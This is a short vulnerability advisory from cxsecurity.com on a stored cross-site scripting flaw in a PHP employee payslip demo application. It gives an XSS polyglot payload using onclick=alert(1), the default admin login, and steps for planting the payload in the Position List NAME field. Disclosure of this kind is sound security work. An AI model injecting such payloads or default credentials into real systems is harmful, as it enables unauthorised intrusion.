Employee Payslip - XSS Polyglots

2023.03.14
Credit: Eren Arslan
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: Employee Payslip - XSS Polyglots # Author: @Eawhitehat - Eren Arslan # Demo available : https://www.sourcecodester.com/php/16264/updated-employee-payslip-generator-sending-mail-using-php-and-gmail-smtp.html # CVE: N/A # XSS POLYGLOTS # Screenshot : https://prnt.sc/eeUxgczBF-Gj Used Payload : “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// Admin account : admin admin123 Method : Connect to panel with admin acc : http://.../admin/ #Vulnerabîlity 1. After login with SUPER ADMIN, go to http://.../admin/?page=positions (Position List page) 2. "Create New" and add in "NAME" the payload : “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// 3. After New Position created, click in the form for exec your payload XSS Polyglots Enjoy !


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top